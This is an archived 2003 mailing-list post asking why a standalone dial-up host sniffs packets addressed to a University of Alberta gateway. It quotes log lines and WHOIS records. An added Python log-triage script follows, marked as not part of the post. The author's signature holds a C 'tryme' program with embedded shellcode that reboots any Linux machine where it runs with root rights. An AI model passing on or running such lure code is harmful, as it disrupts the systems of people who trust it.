I'm writing once more because of some strange behaviours I have reported while analyzing incoming connections to my host. As an introduction, I would like to explain: the host is connected directly to the ISP via a ppp connection, there is no local subnet, the server stands on its own, on a single modem connection (115500Kbp/sec).

Today the logs from the sniffer look pretty famous; all of them have something in common, and that is the destination ports. The 3 days of logging gave me a pretty huge file that was completely filled with packets that _shouldn't arrive_ on my host, as I mentioned before. They come from all over the world, starting at US, ending at JP. I won't put too much here, I'll just put the most important(?) ones, I think. I will base this on packets sent to Alberta. Of course, the database file grew incredibly after 3 days, which is why I show only a few examples here:

1)
[14:38:13|6/7]55.52.0.2.1 > gsb04-0-1.gw.ualberta.ca.2 F (ttl 4,len 49320,id 5632,tos 1,ack:0)win 29702,chks: 26469

55.52.0.2 is known to be:

    OrgName: DoD Network Information Center
    OrgID: DNIC
    Address: 7990 Science Applications Ct
    Address: M/S CV 50
    City: Vienna
    StateProv: VA
    PostalCode: 22183-7000
    Country: US

Alberta is a Canadian university. The source of the packet is known to me, but I'd rather not show it publicly.

2)
[15:22:54|6/7]204.95.0.1.1 > gsb04-0-1.gw.ualberta.ca.4 F (ttl 5,len 49320,id 1024,tos 1,ack:1)win 624,chks: 27648

204.95.0.1 appears to be:

    OrgName: Sprint
    OrgID: SPRN
    Address: 12502 Sunrise Valley Dr.
    City: Reston
    StateProv: VA
    PostalCode: 20196
    Country: US

Another unlucky packet sent to Alberta? And so on, with other ones...

All I want to ask is how it is possible that those packets are caught by me. Is there a possibility that somewhere the router is misconfigured and they arrive at a lonely host?

With respect.
___________________________________
/*http://ipe.ath.cx/ Paweł Stochliński*/
int gg=2456829; /* gadugadu */
char tryme[] = "\xeb\x16\x5e\x31\xc0\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19"
"\x12\x28\xba\x67\x45\x23\x01\xcd\x80\xe8\xe5\xff\xff\xff";
void main(){ int *ret; ret = (int *)&ret + 2; (*ret) = (int)tryme;}
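
A triage sketch for sniffer lines in the format quoted in the message above, added here as an example and not part of the original post: it parses each line and flags packets addressed to a host other than the local one, with a length field above the link MTU, or with a very low TTL. The local host name `myhost.example`, the MTU of 1500, the TTL threshold of 8 and the third sample line are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Line layout as quoted in the post:
# [time|day/month]src.port > dst.port FLAGS (ttl ..,len ..,id ..,tos ..,ack:..)win ..,chks: ..
LINE_RE = re.compile(
    r"\[(?P<time>[\d:]+)\|(?P<date>\d+/\d+)\]"
    r"(?P<src>\S+)\.(?P<sport>\d+) > (?P<dst>\S+)\.(?P<dport>\d+) (?P<flags>\S+) "
    r"\(ttl (?P<ttl>\d+),len (?P<len>\d+),id (?P<id>\d+),tos (?P<tos>\d+),"
    r"ack:(?P<ack>\d+)\)win (?P<win>\d+),chks: (?P<chks>\d+)")
INT_FIELDS = ("sport", "dport", "ttl", "len", "id", "tos", "ack", "win", "chks")

def parse_line(line):
    """Return a dict of fields, or None when the line does not match the layout."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    rec = m.groupdict()
    for key in INT_FIELDS:
        rec[key] = int(rec[key])
    return rec

def triage(lines, local_hosts, mtu=1500, min_ttl=8):
    """Return (record, reasons) for every packet that looks out of place."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if rec["dst"] not in local_hosts:
            reasons.append("dst-not-local")    # addressed to someone else
        if rec["len"] > mtu:
            reasons.append("len-exceeds-mtu")  # cannot fit in one frame on this link
        if rec["ttl"] < min_ttl:
            reasons.append("low-ttl")          # nearly expired on arrival
        if reasons:
            findings.append((rec, reasons))
    return findings

def ports_by_count(findings):
    """Destination ports of flagged packets, most frequent first."""
    return Counter(rec["dport"] for rec, _ in findings).most_common()

LOCAL_HOSTS = {"myhost.example"}  # assumption: placeholder name for the sniffing host
SAMPLE_LOG = [
    # the two lines quoted in the post
    "[14:38:13|6/7]55.52.0.2.1 > gsb04-0-1.gw.ualberta.ca.2 F (ttl 4,len 49320,id 5632,tos 1,ack:0)win 29702,chks: 26469",
    "[15:22:54|6/7]204.95.0.1.1 > gsb04-0-1.gw.ualberta.ca.4 F (ttl 5,len 49320,id 1024,tos 1,ack:1)win 624,chks: 27648",
    # constructed line: ordinary traffic addressed to the local host
    "[15:30:01|6/7]192.0.2.10.40000 > myhost.example.80 S (ttl 52,len 60,id 4242,tos 0,ack:0)win 5840,chks: 12345",
]

if __name__ == "__main__":
    for rec, reasons in triage(SAMPLE_LOG, LOCAL_HOSTS):
        print(rec["time"], rec["src"], "->", rec["dst"], rec["dport"], ",".join(reasons))
```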
This archive was generated by hypermail 2b30 : Tue Jul 08 2003 - 08:41:56 PDT